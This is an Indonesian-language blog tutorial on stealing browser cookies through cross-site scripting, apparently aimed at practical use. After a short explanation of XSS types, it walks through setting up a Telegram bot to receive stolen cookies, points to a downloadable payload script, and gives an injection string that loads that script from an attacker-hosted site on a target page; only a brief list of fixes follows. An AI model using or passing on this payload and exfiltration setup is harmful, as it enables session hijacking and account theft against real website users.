Skip to content Skip to sidebar Skip to footer
Home / Cyber security / Tutorial / Website

Mencuri Cookie Dengan Bug XSS via Telegram

Post a Comment

Apa itu  Cross Site Scripting atau XSS ?

XSS merupakan sebuah eksploitasi keamanan website di mana penyerang dapat menempatkan malicious client-end code ke sebuah laman web. Serangan ini sering terjadi di beberapa tahun terakhir ini dan kebanyakan para hacker menyerang website-website besar.

Dari penjelasan di atas, tujuan dari serangan XSS adalah untuk mengambil sebuah data penting, mengambil sebuah cookie dari user atau admin atau bahkan mengirimkan sebuah program yang bisa merusak user, tetapi penyebabnya seakan-akan adalah dari web itu sendiri.

Makanya, kebanyakan serangan XSS ini tidak bisa diketahui langsung oleh pemilik website tersebut (developernya). ini sangat berbahaya bagi para developer web atau aplikasi karena bisa memberikan kesan buruk kepada user lainnya. apalagi para user atau pihak pasti beranggapan kalau pihak developer  sengaja membuat code berbahaya tersebut.


Cara Kerja Serangan XSS

Dari penjelasan XSS di atas, bisa kita ambil kesimpulan kalau xss sangat berbahaya bagi para developer website. makanya, penting bagi kita untuk mengetahui bagaimana cara kerja XSS tersebut. 

Secara sederhana, XSS itu bekerja dengan mengeksekusi sebuah skrip yang kita rancang di browser korban dengan cara memasukkan kode berbahaya ke halaman web atau web aplikasi. biasanya xss pakai  JavaScript, VBScript, ActiveX, Flash, dan bahasa sisi klien lainnya.

mungkin gambar di bawah ini bisa lebih mencerahkan anda :

Mencuri Cookie Dengan Bug XSS via Telegram

Jenis-Jenis Serangan XSS

ada beberapa jenis serangan XSS dari persistent xss, non-persistent xss, sampai dom-based XSS. 

Persistent XSS atau Stored XSS

Persistent XSS (Stored) merupakan serangan xss yang paling merusak dari segala jenis xss, disini skrip akan disimpan secara permanen oleh server target, seperti database, forum pesan, dan lainnya. 

proses penyerangan persistent XSS dapat dianalogikan seperti berikut:

  • Penyerang buat kode atau skrip berbahaya dalam command input dan mengupload nya.
  • lalu, korban akses page inputan si penyerang.
  • database Website menampilkan skrip penyerang dalam respons.
  • Browser korban menjalankan skrip berbahaya dan mengirimkan cookie ke alamat tujuan penyerang.

Non-persistent XSS

Non-persistent XSS merupakan serangan yang dengan cara menyisipkan code di url. 

proses penyerangan non-persistent XSSdapat dianalogikan seperti berikut:

  • Penyerang membuat sebuah URL yang isinya kode/skrip berbahaya di dalamnya.
  • Penyerang menipu korban dengan soceng atau lainnya supaya korban membuka URL tersebut.
  • Website menerima respon dari korban.
  • Browser korban menjalankan skrip berbahaya lalu mengirimkan cookie ke alamat tujuan penyerang.

Bagaimana Cara Mencuri Cookie Dengan Bug XSS via Telegram ?

XSS Merupakan Most common vulnerability yang artinya sebuah kerentanan yang paling sering kita temui pada keamanan website. Banyak developer menganggap bug ini sebagai bug dengan sekala kecil yang dampaknya tidak membahayakan. Tetapi kenyataannya xss merupakan sebuah bug dengan skala kecil dapat dibenarkan, karena tidak semua xss bisa digunakan untuk mencuri sebuah cookie, walaupun begitu sebagai seorang developer yang baik kita tidak boleh mengganggap bug xss itu sebagai suatu bug yang sepele karena bisa saja bug yang kecil ini dapat memicu chaining effect yang mengakibatkan kerentanan yang jauh lebih besar nantinya.

kali ini kita akan membahas bagaimana cara mencuri cookie dengan telegram. ini Bertujuannya untuk mendapatkan cookie secara realtime.

Langkah Pertama Siapkan Bot Telegramnya

1.Buka Telegram anda
2.Klik icon cari di pojok kanan atas
3.Cari Telegram @BotFather
4.Tulis /start atau klik start
5.Tulis Nama Bot Kalian. Contoh BotAdeGanteng
6.Tulis username bot. Contoh Adeganteng_bot
7.Anda akan mendapat Token Bot

Kedua Silahkan Cari Chat ID
1.Buka Telegram anda
2.Klik icon cari di pojok kanan atas
3.Cari Telegram @get_id_bot
4.Tulis /start atau klik start
5.Anda akan dapat Chat ID

Ketiga Silahkan Konfigurasikan Chat ID dan Token Bot dengan JS Payload
1.Download Payload Di                                                                                                               https://raw.githubusercontent.com/Adelittle/TeleXA/master/telexa.js
2.Isikan Token Bot pada  var tokenBot dan Chat ID pada var chatId
3.Upload Js payload pada web anda
4.Masukkan Xss Pada Target dengan payload

"><script src="http://webanda.co/telexa.js"></script>

Hasil :

Mencuri Cookie Dengan Bug XSS via Telegram

 

Beberapa cara untuk memperbaiki celah xss yaitu:
-Dengan Menggunakan htmlspesialchars
-Dengan Menggunakan htmlentities
-Dengan Memasang Header X-Xss-Protection
-Dengan Menerapkan cookie http Only

Terimakasih dan semoga bermanfaat :)
Author
Author “Yes I'm seeking for someone, to help me. So that some day I will be the someone to help some other one.”

Post a Comment for "Mencuri Cookie Dengan Bug XSS via Telegram"